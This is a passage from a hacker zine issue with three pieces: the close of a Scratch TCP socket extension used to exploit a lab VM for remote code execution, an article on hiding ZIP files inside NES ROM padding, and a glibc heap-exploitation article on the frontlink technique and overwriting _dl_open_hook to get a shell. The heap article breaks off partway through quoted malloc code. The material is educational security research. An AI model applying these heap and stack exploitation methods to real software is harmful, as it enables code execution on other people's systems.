i f not ’ r e a d i n g ’ i n s e l f . s o c k e t s [ s o c k ] :
127 return 0
return s e l f . s o c k e t s [ s o c k ] [ ’ r e a d i n g ’ ]
129
def readline_socket ( s e l f , sock ) :
131 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ r e a d l i n e _ s o c k e t : s o c k e t doesn \ ’ t e x i s t ’
133 return
i f not ’ s o c k e t ’ i n s e l f . s o c k e t s [ s o c k ] or s e l f . s o c k e t s [ s o c k ] [ ’ c l o s e d ’ ] :
135 print ’ r e a d l i n e _ s o c k e t : s o c k e t fd doesn \ ’ t e x i s t ’
return
137 s e l f . sockets [ sock ] [ ’ reading ’ ] = 1
str = ’ ’
139 c = ’ ’
w h i l e c != ’ \ n ’ :
141 read_sockets , write_s , error_s = s e l e c t . s e l e c t ( [ s e l f . s o c k e t s [ sock ] [ ’ s o c k e t ’ ] ] , [] , [] , 0.1)
i f read_sockets :
143 c = s e l f . sockets [ sock ] [ ’ socket ’ ] . recv (1)
s t r += c
145 i f c == ’ ’ :
s e l f . sockets [ sock ] [ ’ c l o s e d ’ ] = 1
147 c = ’ \ n ’ # end t h e w h i l e l o o p
else :
149 c = ’ \ n ’ # end t h e w h i l e l o o p w i t h empty o r p a r t i a l l y r e c e i v e d s t r i n g
s e l f . sockets [ sock ] [ ’ readbuf ’ ] = str
151 i f str :
s e l f . sockets [ sock ] [ ’ reading ’ ] = 2
153 else :
s e l f . sockets [ sock ] [ ’ reading ’ ] = 0
155
def recv_socket ( s e l f , length , sock ) :
157 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
print ’ recv_socket : s o c k e t doesn \ ’ t e x i s t ’
159 return
i f not ’ s o c k e t ’ i n s e l f . s o c k e t s [ s o c k ] or s e l f . s o c k e t s [ s o c k ] [ ’ c l o s e d ’ ] :
161 print ’ recv_socket : s o c k e t fd doesn \ ’ t e x i s t ’
return
163 s e l f . sockets [ sock ] [ ’ reading ’ ] = 1
read_sockets , write_s , error_s = s e l e c t . s e l e c t ( [ s e l f . s o c k e t s [ sock ] [ ’ s o c k e t ’ ] ] , [] , [] , 0.1)
165 i f read_sockets :
str = s e l f . sockets [ sock ] [ ’ socket ’ ] . recv ( length )
167 i f s t r == ’ ’ :
s e l f . sockets [ sock ] [ ’ c l o s e d ’ ] = 1
169 else :
str = ’ ’
171
s e l f . sockets [ sock ] [ ’ readbuf ’ ] = str
173 i f str :
s e l f . sockets [ sock ] [ ’ reading ’ ] = 2
175 else :
s e l f . sockets [ sock ] [ ’ reading ’ ] = 0
177
def n_read ( s e l f , s o c k ) :
179 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
return 0
181 i f s e l f . s o c k e t s [ s o c k ] [ ’ r e a d i n g ’ ] == 2 :
return l e n ( s e l f . s o c k e t s [ s o c k ] [ ’ r e a d b u f ’ ] )
183 else :
return 0
185
def r e a d b u f ( s e l f , type , s o c k ) :
187 i f not s e l f . i s _ c o n n e c t e d ( s o c k ) and not s e l f . i s _ l i s t e n i n g ( s o c k ) :
return ’ ’
189 i f s e l f . s o c k e t s [ s o c k ] [ ’ r e a d i n g ’ ] == 2 :
data = s e l f . s o c k e t s [ sock ] [ ’ readbuf ’ ]
191 buf = ’ ’
i f type == " raw " :
193 buf = data
e l i f type == " c e n c " :
195 buf = data . encode ( ’ s t r i n g _ e s c a p e ’ )
e l i f type == " u r l e n c " :
197 buf = u r l l i b . quote ( data )
e l i f type == " b a s e 6 4 " :
199 buf = base64 . b64encode ( data )
return b u f
201 else :
return ’ ’

14
The final section is simply the description of the The text description includes placeholders for
blocks that the extension makes available over the the arguments to the Python function: %s for a
web service to Scratch. Each block line takes 4 ar- string, %n for a number, and %m for a drop-down
guments: the Python function to call, the type of menu. All %m arguments are post-fixed with the
block (command, predicate or reporter), the text name of the menu from which the available values
description that the Scratch block will present (how are taken. The actual menus are described as a dic-
it will look in Scratch), and the default values. For tionary of named lists.
reference, predicates are simply reporter blocks that Finally, the object is linked to the description
only return a boolean value. and the web service is then started. This Python
script is launched from the command line and will
start the web service on the given port.

descriptor = Descriptor (
2 name = " S c r a t c h S o c k e t s " ,
port = 5000 ,
4 blocks = [
Block ( ’ c r e a t e _ s o c k e t ’ , ’ command ’ , ’ c r e a t e %m. p r o t o conx %m. s o c k n o h o s t %s p o r t %n ’ ,
6 d e f a u l t s =[ " t c p " , 1 , " 1 2 7 . 0 . 0 . 1 " , 0 ] ) ,
Block ( ’ c r e a t e _ l i s t e n e r ’ , ’ command ’ ,
8 ’ c r e a t e %m. p r o t o l i s t e n e r %m. s o c k n o i p %s p o r t %n ’ ,
d e f a u l t s =[ " t c p " , 1 , " 0 . 0 . 0 . 0 " , 0 ] ) ,
10 Block ( ’ a c c e p t _ c o n n e c t i o n ’ , ’ command ’ , ’ a c c e p t c o n n e c t i o n %m. s o c k n o ’ ,
defaults =[1]) ,
12 Block ( ’ c l o s e _ s o c k e t ’ , ’ command ’ , ’ c l o s e s o c k e t %m. s o c k n o ’ ,
defaults =[1]) ,
14 Block ( ’ i s _ c o n n e c t e d ’ , ’ p r e d i c a t e ’ , ’ s o c k e t %m. s o c k n o c o n n e c t e d ? ’ ) ,
Block ( ’ i s _ l i s t e n i n g ’ , ’ p r e d i c a t e ’ , ’ s o c k e t %m. s o c k n o l i s t e n i n g ? ’ ) ,
16 Block ( ’ w r i t e _ s o c k e t ’ , ’ command ’ , ’ w r i t e %s a s %m. e n c o d i n g t o s o c k e t %m. s o c k n o ’ ,
d e f a u l t s =[ " h e l l o " , " raw " , 1 ] ) ,
18 Block ( ’ r e a d l i n e _ s o c k e t ’ , ’ command ’ , ’ r e a d l i n e from s o c k e t %m. s o c k n o ’ ,
defaults =[1]) ,
20 Block ( ’ r e c v _ s o c k e t ’ , ’ command ’ , ’ r e a d %n b y t e s from s o c k e t %m. s o c k n o ’ ,
d e f a u l t s =[255 , 1 ] ) ,
22 Block ( ’ n_read ’ , ’ r e p o r t e r ’ , ’ n_read from s o c k e t %m. s o c k n o ’ ,
defaults =[1]) ,
24 Block ( ’ r e a d b u f ’ , ’ r e p o r t e r ’ , ’ r e c e i v e d b u f a s %m. e n c o d i n g from s o c k e t %m. s o c k n o ’ ,
d e f a u l t s =[ " raw " , 1 ] ) ,
26 Block ( ’ r e a d i n g ’ , ’ r e p o r t e r ’ , ’ r e a d f l a g f o r s o c k e t %m. s o c k n o ’ ,
defaults =[1]) ,
28 Block ( ’ c l e a r _ r e a d _ f l a g ’ , ’ command ’ , ’ c l e a r r e a d f l a g f o r s o c k e t %m. s o c k n o ’ ,
defaults =[1]) ,
30 ],
menus = d i c t (
32 p r o t o = [ " t c p " , "udp" ] ,
e n c o d i n g = [ " raw " , " c enc " , " u r l enc " , " b a s e 6 4 " ] ,
34 sockno = [ 1 , 2 , 3 , 4 , 5 ] ,
),
36 )

38 e x t e n s i o n = E x t e n s i o n ( SSocket , d e s c r i p t o r )

40 i f __name__ == ’__main__ ’ :
e x t e n s i o n . r u n _ f o r e v e r ( debug=True )

15
Linking into Scratch Scratch is a great language/IDE to teach cod-
ing to children. Once they’ve successfully built a
The web service provides the required web ser- racing game and a PacMan clone, it can also be
vice description file from its index page. Simply used to teach them to interact with the world out-
browse to http://localhost:5000 and download side of Scratch. As I mentioned in the introduc-
the Scratch 2 extension file (Scratch Scratch Sock- tion, we’ve interfaced Scratch to Midi and Arduino
ets English.s2e). To load this into Scratch we need projects from where a whole world opens up. The
to use the super-secret ‘shift click’ on the File menu above screen shots show how it can also be inter-
to reveal the ‘Import experimental HTTP extension’ faced to a simple TCP/IP socket extension to allow
option. Navigate to the s2e file and the new blocks interaction with anything on the network.
will appear under ‘More Blocks’. From here it is possible to cause buffer over-
flows that lead to crashes and, through standard
Fuzzing, crashing, controlling EIP, and stack-smashing techniques, to remote code execu-
exploiting tion. When I was a child, Z-80 assembly was the
second language I learned after BASIC on a ZX
In order to demonstrate the use of the extension, Spectrum. (The third was 8086 funnily enough!)
I obtained and booted the TinySploit VM from I hunted for infinite lives and eventually became a
Saumil Shah’s ExploitLab, and then used the given reasonable C programmer. Perhaps with a (slightly
stack-based overflow to gain remote code execution. better) socket extension, Scratch could become a
The details are straight forward; the shell code by gateway to x86 shell code. I wonder whether IT
Julien Ahrens came from ExploitDB and was modi- teachers would agree?
fied to execute Busybox correctly.8 Scratch projects
are available as an attachment to this PDF.9 —Kev Sheldrake

8 https://www.exploit-db.com/exploits/43755/
9 unzip pocorgtfo18.pdf scratchexploits.zip

16
18:04 Concealing ZIP Files in NES Cartridges
by Vi Grey

Hello, neighbors. Numbers and ranges included in figures in this


article will be in Hexadecimal. Range values are big-
This story begins with the fantastic work de- endian and ranges work the same as Python slices,
scribed in PoCkGTFO 14:12, which presented where [x:y] is the range of x to, but not including,
an NES ROM that was also a PDF. That file, y.
pocorgtfo14.pdf, was by coincidence also a ZIP
file. That issue inspired me to learn 6502 Assembly, iNES File Format
develop an NES game from scratch, and burn it onto
a physical cartridge for the #tymkrs. This article focuses on the iNES file format. This
is because, as was described in PoCkGTFO 14:12,
iNES is essentially the de facto standard for NES
During development, I noticed that the unused ROM files. Figure 8 shows the structure of an NES
game space was just being used as padding and that ROM in the iNES file format that fits on an NROM-
any data could be placed in that padding. Although 128 cartridge.10
I ended up using that space for something else in the The first sixteen bytes of the file MUST be the
game, I realized that I could use padding space to iNES Header, which provides information for NES
make an NES ROM that is also a ZIP file. This Emulators to figure out how to play the ROM.
polyglot file wouldn’t make the NES ROM any big- Following the iNES Header is the 16 KiB PRG
ger than it originally was. I quickly got to work on ROM. If the PRG ROM data doesn’t fill up that en-
this idea. tire 16 KiB, then the PRG ROM will be padded. As
long as the PRG padding isn’t actually being used,
The method described in this article to create an it can be any byte value, as that data is completely
NES + ZIP polyglot file is different from that which ignored. The final six bytes of the PRG ROM data
was used in PoCkGTFO 14:12. In that method, are the interrupt vectors, which are required.
none of the ZIP file data is saved inside the NES Eight kilobytes of CHR ROM data follows the
ROM itself. My method is able to retain the ZIP PRG ROM.
file data, even when it burned onto a cartridge. If
you rip the data off of a cartridge, the resulting NES
ROM file will still be an NES + ZIP polyglot file.

Start of iNES File


iNES Header [0000:0010]

PRG ROM [0010:4010]

PRG Padding [XXxx:400A]

PRG Interrupt Vectors [400A:4010]

CHR ROM [4010:6010]

Figure 8. iNES File Format


10 NROM-128 is a board that does not use a mapper and only allows a PRG ROM size of 16 KiB.

17
18
ZIP File Format Central Directory File Headers
There are two things in the ZIP file format that we For every file or directory that is zipped in the ZIP
need to focus on to create this polyglot file, the End file, a Central Directory File Header exists. The
of Central Directory Record and the Central Direc- parts we care about are shown in Figure 10.
tory File Headers. Each Central Directory File Header starts with
the four-byte big-endian signature 504B0102.
End of Central Directory Record 38 bytes after the signature is a four-byte Lo-
cal Header Offset, which specifies how far from the
To find the data of a ZIP file, a ZIP file extractor beginning of the file the corresponding local header
should start searching from the back of the file to- is.
wards the front until it finds the End of Central Di-
rectory Record. The parts we care about are shown Start of a Central Directory File Header
in Figure 9.
Central Directory File Header
The End of Central Directory Record begins
Signature (504B0102) [0000:0004]
with the four-byte big-endian signature 504B0506.
Twelve bytes after the end of the signature is ... [0004:002A]
the four-byte Central Directory Offset, which states
how far from the beginning of the file the start of Local Header Offset [002A:002E]
the Central Directory will be found.
The following two bytes state the ZIP file com- ... [002E:]
ment length, which is how many bytes after the ZIP
file data the ZIP file comment will be found. Two Figure 10. Central Directory File Header Format
bytes for the comment length means we have a maxi-
mum length value of 65,535 bytes, more than enough
space to make our polyglot file.

Start of End of Central Directory Record


End of Central Directory Record
Signature (504B0506) [0000:0004]

... [0004:0010]

Central Directory Offset [0010:0014]

Comment Length (L) [0014:0016]

ZIP File Comment [0016:0016 + L]

Figure 9. End of Central Directory Record Format


11 unzip pocorgtfo18.pdf APPNOTE.TXT

19
Miscellaneous ZIP File Fun Start of iNES + ZIP Polyglot File

Five bytes into each Central Directory File Header iNES Header [0000:0010]
is a byte that determines which Host OS the file
PRG ROM [0010:4010]
attributes are compatible for.
The document, “APPNOTE.TXT - .ZIP File PRG Padding [XXxx:YYyy]
Format Specification” by PKWARE, Inc., specifies
what Host OS goes with which decimal byte value.11 ZIP File Data [YYyy:400A]
I included a list of hex byte values for each Host OS
below. Comment Length (0602) [4008:400A]
1 00 − MS−DOS and OS/2
01 − Amiga PRG Interrupt Vectors [400A:4010]
3 02 − OpenVMS
03 − UNIX CHR ROM [4010:6010]
5 04 − VM/CMS
05 − A t a r i ST
7 06 − OS/2 H. P . F . S .
Figure 11. iNES + ZIP Polyglot File Format
07 − Macintosh
9 08 − Z−System
09 − CP/M iNES + ZIP File Format
11 0A − Windows NTFS
0B − MVS (OS/390 − Z/OS) With this information about iNES files and ZIP files,
13 0C − VSE we can now create an iNES + ZIP polyglot file, as
0D − Acorn R i s c
15 0E − VFAT
shown in Figure 11.
0F − A l t e r n a t e MVS Here, the first sixteen bytes of the file continue
17 10 − BeOS to be the same iNES header as before.
11 − Tandem The PRG ROM still starts in the same location.
19 12 − OS/400
13 − OS/X ( Darwin ) Somewhere in the PRG Padding an amount of bytes
21 (14−FF) − Unused equal to the length of the ZIP file data is replaced
with the ZIP file data. The ZIP file data starts at
hex offset YYyy and ends right before the PRG Inter-
Although 0A is specified for Windows NTFS and rupt Vectors. This ZIP file data MUST be smaller
0B is specified for MVS (OS/390 - Z/OS), I kept than or equal to the size of the PRG Padding to
getting the Host OS value of TOPS-20 when I used make this polyglot file.
0A and NTFS when I used 0B. Local Header Offsets and the Central Directory
I ended up deciding to set the Host OS for all Offset of the ZIP file data are updated by adding the
of the Central Directory File Headers to Atari ST. little-endian hex value yyYY to them and the ZIP file
With that said, I have tested every Host OS value comment length is set to the little-endian hex value
from 00 to FF on this file and it extracted properly 0602 (8,198 in Decimal), which is the length of the
for every value. Different Host OS values may pro- PRG Interrupt Vectors plus the CHR ROM (8 KiB).
duce different read, write, and execute values for the PRG Interrupt Vectors and CHR ROM data re-
extracted files and directories. main unmodified, so they are still the same as be-
fore.
Because the iNES header is the same, the PRG
and CHR ROM are still the correct size, and none
of the required PRG ROM data or any of the CHR
ROM data were modified, this file is still a com-
pletely standard NES ROM. The NES ROM file
does not change in size, so there is no extra “garbage
data” outside of the NES ROM file as far as NES
emulators are concerned.
With the ZIP file offsets being updated and all
12 The only ZIP file extractor I have gotten any warnings from with this polyglot file was 7-Zip for Windows specifically, with

the warning, “The archive is open with offset.” The polyglot file still extracted properly.

20
data after the ZIP file data being declared as a ZIP
file comment, this file is a standard ZIP file that your
ZIP file extractor will be able to properly extract.12

NES Cartridge
The PRG and CHR ROMs of this polyglot file can
be burned onto EPROMs and put on an NROM-
128 board to make a completely functioning NES
cartridge.
Ripping the NES ROM from the cartridge and
turning it back into an iNES file will result in the file
being a NES + ZIP polyglot file again. It is there-
fore possible to sneak a secret ZIP file to someone
via a working NES cartridge.
Don’t be surprised if that crappy bootleg copy of
Tetris I give you is also a ZIP file containing secret
documents!

Source Code
This NES + ZIP polyglot file is a quine.13 Unzip
it and the extracted files will be its source code.14
Compile that source code and you’ll create another
NES + ZIP polyglot file quine that can then be un-
zipped to get its source code.
I was able to make this file contain its own source
code because the source code itself was quite small
and highly compressible in a ZIP file.

13 unzip pocorgtfo18.pdf neszip-example.nes


14 unzip neszip-example.nes

21
18:05 House of Fun; or,
Heap Exploitation against GlibC in 2018
by Yannay Livneh

GlibC’s malloc implementation is a gift that So, an attacker in control of fd and bk can write the
keeps on giving. Every now and then someone finds value of bk to (somewhat after) fd and vice versa.
a way to turn it on its head and execute arbitrary This is why, in late 2004, a series of patches to
code. Today is one of those days. Today, dear GNU libc malloc implemented over a dozen manda-
neighbor, you will see yet another path to code ex- tory integrity assertions, effectively rendering the
ecution. Today you will see how you can overwrite existing techniques obsolete. If the previous sen-
arbitrary memory addresses—yes, more than one!— tence sounds familiar, this is not a coincidence, as it
with a pointer to your data. Today you will see is a quote from the famous Malloc Maleficarum.17
the perfect gadget that will make the code of your This paper was published in 2005 and was imme-
choosing execute. Welcome to the House of Fun. diately regarded as a classic. It described five new
heap exploitation techniques. Some, like previous
techniques, exploited the structure of the heap, but
The History We Were Taught others introduced a new capability: allocating ar-
The very first heap exploitation techniques were bitrary memory. These newer techniques exploited
publicly introduced in 2001. Two papers in the fact that malloc is a memory allocator, returning
Phrack 57—Vudo Malloc Tricks15 and Once Upon memory for the caller to use. By corrupting various
a Free16 —explained how corrupted heap chunks can fields used by the allocator to decide which memory
lead to full compromise. They presented methods to allocate (the chunk’s size and pointers to sub-
that abused the linked list structure of the heap sequent chunks), exploiters tricked the allocator to
in order to gain some write primitives. The best return addresses in the stack, .got, or other places.
known technique introduced in these papers is the Over time, many more integrity checks were
unlink technique, attributed to Solar Designer. It added to glibc. These checks try to make sure the
is quite well known today, but let’s explain how it size of a chunk makes sense before allocating it to
works anyway. In a nutshell, deletion of a controlled the user, and that it’s in a reasonable memory re-
node from a linked list leads to a write-what-where gion. It is not perfect, but it helped to some degree.
primitive. Then, hackers came up with a new idea. While
Consider this simple implementation of list dele- allocating memory anywhere in the process’s virtual
tion: space is a very strong primitive, many times it’s suf-
ficient to just corrupt other data on the heap, in
1 void l i s t _ d e l e t e ( node_t ∗ node ) { neighboring chunks. By corrupting the size field or
node−>fd−>bk = node−>bk ; even just the flags in the size field, it’s possible to
3 node−>bk−>f d = node−>f d ;
} corrupt the chunk in such a way that makes the
heap allocate a chunk which overlaps another chunk
with data the exploiter wants to control. A couple
of techniques which demonstrate it were published
This is roughly equivalent to: in recent years, most notably Chris Evans’ The poi-
soned NUL byte, 2014 edition.18
prev = node−>bk ;
2 next = node−>f d ; To mitigate against these kinds of attacks, an-
∗( next + o f f s e t o f ( node_t , bk ) ) = p r e v ; other check was added. The size of a freed chunk
4 ∗( prev + o f f s e t o f ( node_t , f d ) ) = n e x t ; is written twice, once in the beginning of the chunk
and again at its end. When the allocator makes
a decision based on the chunk’s size, it verifies that
15 unzip pocorgtfo18.pdf vudo.txt # Phrack 57:8
16 unzip pocorgtfo18.pdf onceuponafree.txt # Phrack 57:9
17 unzip pocorgtfo18.pdf MallocMaleficarum.txt
18 https://googleprojectzero.blogspot.com/2014/08/
19 git clone https://github.com/shellphish/how2heap || unzip pocorgtfo18.pdf how2heap.zip

22
both sizes agree. This isn’t bulletproof, but it helps. earlier, an annoying doubt popped into my mind.
The most up-to-date repository of currently us- The primitive I found in malloc’s code is very much
able techniques is maintained by the Shellphish CTF connected to the old unlink primitive; they are lit-
team in their how2heap GitHub repository.19 erally counterparts. How come no one had found
and published it in the early years of heap exploita-
A Brave New Primitive tion? And if someone had, how come neither I nor
any of my colleagues I discussed it with had ever
Sometimes, in order to take two steps forward we heard of it?
must first take one step back. Let’s travel back in
time and examine the structure of the heap like they So I sat down and read the early papers, the ones
did in 2001. The heap internally stores chunks in from 2001 that everyone says contain only obsolete
doubly linked lists. We already discussed list dele- and mitigated techniques. And then I learned, lo
tion, how it can be used for exploitation, and the and behold, it had been found many years ago!
fact it’s been mitigated for many years. But list
deletion (unlinking) is not the only list operation!
There is another operation: insertion.
Consider the following code:
History of the Forgotten Frontlink
void l i s t _ i n s e r t _ a f t e r ( prev , node ) {
2 node−>bk = p r e v ;
node−>f d = prev−>f d ; The list insertion primitive described in the previous
4
prev−>fd−>bk = node ;
section is in fact none other than the frontlink tech-
6 prev−>f d = node ; nique. This technique is the second one described in
} Vudo Malloc Tricks, the very first paper about heap
exploitation from 2001. (Part 3.6.2.)
In the paper, the author says it is “less flexible
The line before the last roughly translates to: and more difficult to implement” in comparison to
1 n e x t = prev−>f d the unlink technique. It is far inferior in a world with
∗ ( n e x t + o f f s e t ( node_t , bk ) ) = node ; no NX bit (DEP), as it writes a value the attacker
does not fully control, whereas the unlink technique
enables the attacker to control the written data (as
An attacker in control of prev->fd can write the long as it’s a writable address). I believe that for
inserted node address wherever she desires! this reason the frontlink method was less popular.
Having this control is quite common in the case And so, it has almost been completely forgotten.
of heap-based corruptions. Using a Use-After-Free
In 2002, malloc was re-written as an adaptation
or a Heap-Based-Buffer-Overflow, the attacker com-
of Doug Lea’s malloc-2.7.0.c. This re-write refac-
monly controls the chunk’s fd (forward pointer).
tored the code and removed the frontlink macro,
Note also that the data written is not arbitrary. It’s
but basically does the same thing upon list insertion.
an address of the inserted node, a chunk on the heap
From this year onward, there is no way to attribute
which may be allocated back to the user, or might
the name frontlink with the code the technique is
still be in the user’s control! So this is not only a
exploiting.
write-where primitive, it’s more of a write-pointer-
to-what-where. In 2003, William Robertson, et al., announced a
Looking at malloc’s code, this primitive can be new system that “detects and prevents all heap over-
quite easily employed. Insertion into lists happens flow exploits” by using some kind of cookie-based de-
when a freed chunk is inserted into a large bin. But tection. They also announced it in the security focus
more about this later. Before diving into the details mailing list.20 One of the more interesting responses
of how to use it, there are some issues we need to to this announcement was from Stefan Esser, who
clear first. described his private mitigation for the same prob-
When I started writing this paper, after under- lem. This solution is what we now know as “safe
standing the categorization of techniques I described unlinking.”
20 https://www.securityfocus.com/archive/1/346087/30/0/

23
Robertson says that it only prevents unlink at- from early 2005 with glibc 2.3.5 installed. The code
tacks, to which Esser responds: is presented later in this paper.
In conclusion, the frontlink technique never
I know that modifying unlink does not
gained popularity. There is no way to link the name
protect against frontlink attacks. But
frontlink to any existing code, and all relevant pa-
most heap exploiters do not even know
pers claim it’s useless and a waste of time.
that there is anything else than unlink.
However, it works in practice today and on every
Following this correspondence, in late 2004, the machine I checked.
safe unlinking mitigation was added to malloc’s
code.
In 2005, the Malloc Maleficarum is published.
Back To Completing Exploitation
Here is the first paragraph from the paper: At this point you might think this write-pointer-
In late 2001, “Vudo Malloc Tricks” and to-what-where primitive is nice, but there is still a
“Once Upon A free()” defined the ex- lot of work to do to get control over a program’s
ploitation of overflowed dynamic mem- flow. We need to find a suitable pointer to over-
ory chunks on Linux. In late 2004, a write, one which points to a struct that contains
series of patches to GNU libc malloc im- function pointers. Then we can trigger this in-
plemented over a dozen mandatory in- direct function call. Surprisingly, this turns out
tegrity assertions, effectively rendering to be rather easy. Glibc itself has some pointers
the existing techniques obsolete. which fit perfectly for this primitive. Among some
other pointers, the most suitable for our needs is
Every paper that followed it and accounted for the _dl_open_hook. This hook is used when load-
the history of heap exploits has the same narrative. ing a new library. In this process, if this hook is not
In Malloc Des-Maleficarum,21 Blackeng states: NULL, _dl_open_hook->dlopen_mode() is invoked
which can very much be in the attacker’s control!
The skills published in the first one of As for the requirement of loading a library, fear
the articles, showed: not! The allocator itself does it for us when an
— unlink () method. integrity check fails. So all an attacker needs to
— frontlink () method. do is to fail an integrity check after overwriting
. . . these methods were applicable until _dl_open_hook and enjoy her shell.23
the year 2004, when the GLIBC library
That’s it for theory. Let’s see how we can make
was patched so those methods did not
it happen in the actual implementation!
work.
And in Yet Another Free Exploitation Tech-
nique,22 Huku states:
The Gory Internals of Malloc
First, a short recollection of the allocator’s internals.
The idea was then adopted by glibc-2.3.5
along with other sanity checks thus ren- GlibC malloc handles it’s freed chunks in bins.
dering the unlink() and frontlink() A bin is a linked list of chunks which share some
techniques useless. attributes. There are four types of bins: fast, un-
sorted, small, and large. The large bins contain
I couldn’t find any evidence that supports these freed chunks of a specific size-range, sorted by size.
assertions. On the contrary, I managed to success- Putting a chunk in a large bin happens only after
fully employ the frontlink technique on various plat- sorting it, extracting it from the unsorted bin and
forms from different years, including Fedora Core 4 putting it in the appropriate small or large bin. The
21 unzip pocorgtfo18.pdf mallocdesmaleficarum.txt # Phrack 66:10
22 unzip pocorgtfo18.pdf yetanotherfree.txt # Phrack 66:6
23 Another promising pointer is the _IO_list_all pointer, or any pointer to the FILE struct. The implications of overwriting

this pointer are explained in the House of Orange. In recent glibc versions, corruption of FILE vtables has been mitigated to
some extent, therefore it’s harder to use than _dl_open_hook. Ironically, this mitigation uses _dl_open_hook and this is how I
got to play with it in the first place. To read more about _IO_list_all and overwriting FILE vtables, see Angelboy’s excellent
HITCON 2016 CTF qualifier post. To see how to bypass the mitigation, see my own 300 CTF challenge.
unzip pocorgtfo18.pdf 300writeup.md

24
sorting process happens when a user requests an al- The Frontlink Technique in 2018
location which can’t be satisfied by the fast or small
So, remembering our nice theories, we need to con-
bins. When such a request is made, the allocator it-
sider how can we manipulate the list insertion to
erates over the chunks in the unsorted bin and puts
our needs. How can we control the fwd and bck
each chunk where it belongs. After sorting the un-
pointers?
sorted bin, the allocator applies a best-fit algorithm
When the victim chunk belongs in a small bin,
and tries to find the smallest freed chunk that can
these values are hard to control. The bck is the ad-
satisfy the user’s request. As a large bin contains
dress of the bin, an address in the globals section of
chunks of multiple sizes, every chunk in the bin not
glibc. And the fwd address is a value written in this
only points to the previous and next chunk (bk and
section. bck->fd which means it’s a value written
fd) in the bin but also points to the next and previ-
in glibc’s global section. A simple heap vulnera-
ous chunks which are smaller and bigger than itself
bility such as a Use-After-Free or Buffer Overflow
(bk_nextsize and fd_nextsize). Chunks in a large
does not let us corrupt this value in any immediate
bin are sorted by size, and these pointers speed up
way, as these vulnerabilities usually corrupt data on
the search for the best fit chunk.
the heap. (A different mapping entirely from glibc.)
Figure 13 illustrates a large bin with seven
The fast bins and unsorted bin are equally unhelp-
chunks of three sizes. Figure 12 contains the rel-
ful, as insertion to these bins is always done at the
evant code from _int_malloc.24
head of the list.
Here, the size variable is the size of the victim
So our last option to consider is using the large
chunk which is removed from the unsorted bin. The
bins. Here we see that some data from the chunks
logic in lines 3566–3620 tries to determine between
is used. The loop which iterates over the chunks
which bck and fwd chunks it should be inserted.
in a large bin uses the fd_nextsize pointer to set
Then, in lines 3622–3626, it is actually inserted into
the value of fwd and the value of bck is derived
the list. In the case that the victim chunk belongs in
from this pointer as well. As the chunk pointed by
a small bin, bck and fwd are trivial. As all chunks
fwd must meet our size requirement and the bck
in a small bin have the same size, it does not mat-
pointer is derived from it, we better let it point to
ter where in the bin it is inserted, so bck is the
a real chunk in our control and only corrupt the
head of the bin and fwd is the first chunk in the bin
bk of this chunk. Corrupting the bk means that
(lines 3568–3573). However, if the chunk belongs in
line 3626 writes the address of the victim chunk
a large bin, as there are chunks of various sizes in
to a location in our control. Even better, if the
the bin, it must be inserted in the right place to keep
victim chunk is of a new size that does not previ-
the bin sorted.
ously exist in the bin, lines 3611–3612 insert this
If the large bin is not empty (line 3581) the code
chunk to the nextsize list and write its address to
iterates over the chunks in the bin with a decreasing
fwd->bk_nextsize->fd_nextsize. This means we
size until it finds the first chunk that is not smaller
can write the address of the victim chunk to another
than the victim chunk (lines 3599–3603). Now, if
location. Two writes for one corruption!
this chunk is of a size that already exists in the bin,
In summary, if we corrupt a bk and bk_nextsize
there is no need to insert it into the nextsize list, so
of a chunk in the large bin and then cause mal-
just put it after the current chunk (lines 3605–3607).
loc to insert another chunk with a bigger size,
If, on the other hand, it is of a new size, it needs
this will overwrite the addresses we put in bk and
to be inserted into the nextsize list (lines 3608–
bk_nextsize with the address of the freed chunk.
3614). Either way, eventually set the bck accord-
ingly (line 3615) and continue to the insertion of the
victim chunk into the linked list (lines 3622–3626).

24 All code glibc code snippets in this paper are from version 2.24.

25
3504 w h i le ( ( v i c t i m = u n s o r t e d _ c h u n k s ( av )−>bk ) != unsorted_chunks ( av ) )
3505 {
3506 bck = v i c t i m −>bk ;
...
3511 s i z e = chunksize ( victim ) ;
...
3549 /∗ remove from u n s o r t e d l i s t ∗/
3550 u n s o r t e d _ c h u n k s ( av )−>bk = bck ;
3551 bck−>f d = u n s o r t e d _ c h u n k s ( av ) ;
3552
3553 /∗ Take now instead of binning if exact fit ∗/
3554
3555 if ( s i z e == nb )
3556 {
...
3561 void ∗p = chunk2mem ( v i c t i m ) ;
3562 alloc_perturb (p , bytes ) ;
3563 return p ;
3564 }
3565
3566 /∗ place chunk in bin ∗/
3567
3568 if ( in_smallbin_range ( size ))
3569 {
3570 victim_index = smallbin_index ( s i z e ) ;
3571 bck = b i n _ a t ( av , v i c t i m _ i n d e x ) ;
3572 fwd = bck−>f d ;
3573 }
3574 else
3575 {
3576 victim_index = largebin_index ( s i z e ) ;
3577 bck = b i n _ a t ( av , v i c t i m _ i n d e x ) ;
3578 fwd = bck−>f d ;
3579
3580 /∗ m a i n t a i n l a r g e b i n s i n s o r t e d o r d e r ∗/
3581 i f ( fwd != bck )
3582 {
3583 /∗ Or w i t h i n u s e b i t t o s p e e d c o m p a r i s o n s ∗/
3584 s i z e |= PREV_INUSE ;
3585 /∗ i f s m a l l e r t h a n s m a l l e s t , b y p a s s l o o p b e l o w ∗/
3586 a s s e r t ( ( bck−>bk−>s i z e & NON_MAIN_ARENA) == 0 ) ;
3587 i f ( ( unsigned long ) ( s i z e ) < ( unsigned long ) ( bck−>bk−>s i z e ) )
3588 {
3589 fwd = bck ;
3590 bck = bck−>bk ;
3591
3592 v i c t i m −>f d _ n e x t s i z e = fwd−>f d ;
3593 v i c t i m −>b k _ n e x t s i z e = fwd−>f d −>b k _ n e x t s i z e ;
3594 fwd−>f d −>b k _ n e x t s i z e = v i c t i m −>b k _ n e x t s i z e −>f d _ n e x t s i z e = v i c t i m ;
3595 }
3596 else
3597 {
3598 a s s e r t ( ( fwd−>s i z e & NON_MAIN_ARENA) == 0 ) ;
3599 w h il e ( ( unsigned long ) s i z e < fwd−>s i z e )
3600 {
3601 fwd = fwd−>f d _ n e x t s i z e ;
3602 a s s e r t ( ( fwd−>s i z e & NON_MAIN_ARENA) == 0 ) ;
3603 }
3604
3605 if ( ( unsigned long ) s i z e == ( unsigned long ) fwd−>s i z e )
